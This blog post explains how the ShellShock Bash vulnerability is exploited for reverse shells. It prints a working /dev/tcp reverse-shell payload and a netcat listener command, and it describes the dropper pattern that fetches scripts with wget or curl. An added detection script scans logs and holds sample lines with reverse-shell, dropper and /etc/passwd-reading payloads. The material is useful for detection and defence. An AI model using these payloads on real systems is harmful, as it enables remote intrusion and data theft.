Exploiting ShellShock getting a reverse shell

A Bash vulnerability (aka ShellShock) was published two months ago (CVE-2014-6271, original release date 09/24/2014), reaching the highest score for Impact and Exploitability at NIST-NVD, with the following overview:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

The first patch released was incomplete and left another vulnerability (CVE-2014-7169, original release date 09/24/2014), again with the top score for Impact and Exploitability at NIST-NVD, with the following overview (highlight is mine):

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271

Two months later, ShellShock is still in the wild, used to exploit thousands of systems all over the net, installing PHP/Perl/IRC shells or any other malicious payload. This is possible because the original ShellShock vulnerability is now tied to five other CVEs:

  • CVE-2014-6271 (Initial report)
  • CVE-2014-6277
  • CVE-2014-6278
  • CVE-2014-7169
  • CVE-2014-7186
  • CVE-2014-7187

The following image, taken from the F5 website, explains how ShellShock works and why it is so dangerous:

[Image: ShellShock diagram from the F5 website]

Basically, by exploiting this vulnerability you can run any command (or any sequence of commands), but in 90% of the cases I found, the final goal was the installation of a shell, usually in five steps:

  1. Exploit the vulnerability
  2. Download a script (Perl, Bash, C, etc.) from a remote site via wget, curl, etc.
  3. Save the script under /tmp
  4. Execute the script
  5. Clean up (remove the original file from /tmp)

In many cases this approach fails because Perl/PHP/C shells are detected and removed by the safeguards protecting the system, and the remote sites can be blocked by web filtering policies. In recent days, however, I noticed a specific attack that does not use any malicious code, only the shell the system already has:

() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

Let me explain it better:

() { ignored;}; is the ShellShock trigger: the value starts with a function definition, and a vulnerable Bash runs whatever follows the closing }; (delivered, for example, in an HTTP header such as User-Agent to a CGI script, which mod_cgi copies into an environment variable)
/bin/bash -i starts an interactive Bash session
>& /dev/tcp/ip/port redirects standard output and standard error to the remote host (e.g. /dev/tcp/1.2.3.4/8080 sends the Bash session to IP 1.2.3.4 on TCP port 8080). /dev/tcp is not a real device: Bash itself opens the TCP connection when a redirection names that path, unless it was built without network redirections
0>&1 connects standard input to the same socket. Strictly this should be written 0<&1, but both forms duplicate file descriptor 1 onto 0, and since descriptor 1 is a bidirectional TCP socket it works either way

On the remote server a listener must be running: for testing I used nc -l 8080 (netcat listening on port 8080). Note that the two common netcat variants differ here: the OpenBSD one accepts nc -l 8080, while the traditional/GNU one needs the port after -p, i.e. nc -l -p 8080.
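As an added example (not part of the original post, and not the attacker's own tooling), here is a small shell script covering both sides of what is described above: the classic local check for CVE-2014-6271, and a detector that runs over constructed Apache access-log lines to tell the five-step dropper pattern apart from the /dev/tcp reverse shell variant. The function names and sample log lines are my own, and the IP addresses come from the RFC 5737 documentation ranges.

```shell
#!/bin/sh
# Added example, not code from the original post: a local ShellShock check plus
# a detector for ShellShock probes in Apache access-log lines. Function names,
# the sample log lines and the IP addresses (RFC 5737 documentation ranges)
# are constructed for this example.

# Classic CVE-2014-6271 check: a vulnerable Bash imports an environment
# variable whose value starts with "() {" as a function and also executes the
# command that follows the closing "};". Prints "vulnerable", "patched" or
# "no-bash" (when no bash binary is on PATH).
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# Classify one log line by what the injected payload does:
#   clean          no "() {" function prefix at all
#   reverse-shell  Bash /dev/tcp/ redirection, no dropper needed (the variant
#                  discussed on this page)
#   dropper        wget/curl fetch of a remote script (the five-step pattern)
#   other          "() {" present, followed by some other command
classify_log_line() {
    case "$1" in
        *'() {'*) ;;
        *) echo "clean"; return 0 ;;
    esac
    case "$1" in
        */dev/tcp/*)   echo "reverse-shell" ;;
        *wget*|*curl*) echo "dropper" ;;
        *)             echo "other" ;;
    esac
}

# Extract the command that follows "};", up to the closing quote of the
# User-Agent (or any other quoted) field in which the payload was sent.
extract_payload() {
    printf '%s\n' "$1" | sed -n 's/.*() {[^}]*};[[:space:]]*\([^"]*\)".*/\1/p'
}

# Read log lines on stdin; print "<class><TAB><payload>" for every hit.
scan_log() {
    while IFS= read -r line; do
        kind=$(classify_log_line "$line")
        [ "$kind" = "clean" ] && continue
        printf '%s\t%s\n' "$kind" "$(extract_payload "$line")"
    done
}

# Constructed sample in Apache combined format. The second line carries the
# /dev/tcp payload from this post with the ip/port placeholders filled in.
SAMPLE_LOG='10.0.0.9 - - [20/Nov/2014:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Nov/2014:10:12:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "() { :;}; /bin/bash -i >& /dev/tcp/198.51.100.4/8080 0>&1"
10.0.0.8 - - [20/Nov/2014:10:12:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 200 88 "-" "() { ignored;}; /usr/bin/wget -q -O /tmp/x.pl http://203.0.113.20/x.pl; perl /tmp/x.pl; rm -f /tmp/x.pl"
10.0.0.6 - - [20/Nov/2014:10:12:14 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" 200 30 "-" "() { :;}; echo Content-type: text/plain; echo; /bin/cat /etc/passwd"'

# Stand-alone run: report the local Bash state, then list the hits.
echo "local bash: $(shellshock_check)"
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

Feed a real access log with `scan_log < /var/log/apache2/access.log` (path is an assumption; adjust to your server). The classifier keys on the function prefix rather than on any particular second stage, so it catches the bare probes attackers send first, and the `reverse-shell` class is exactly the `/dev/tcp` trick that needs no download, which is why web filtering of the dropper sites does not stop it.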

This is a very interesting approach to exploiting ShellShock and getting a reverse shell :)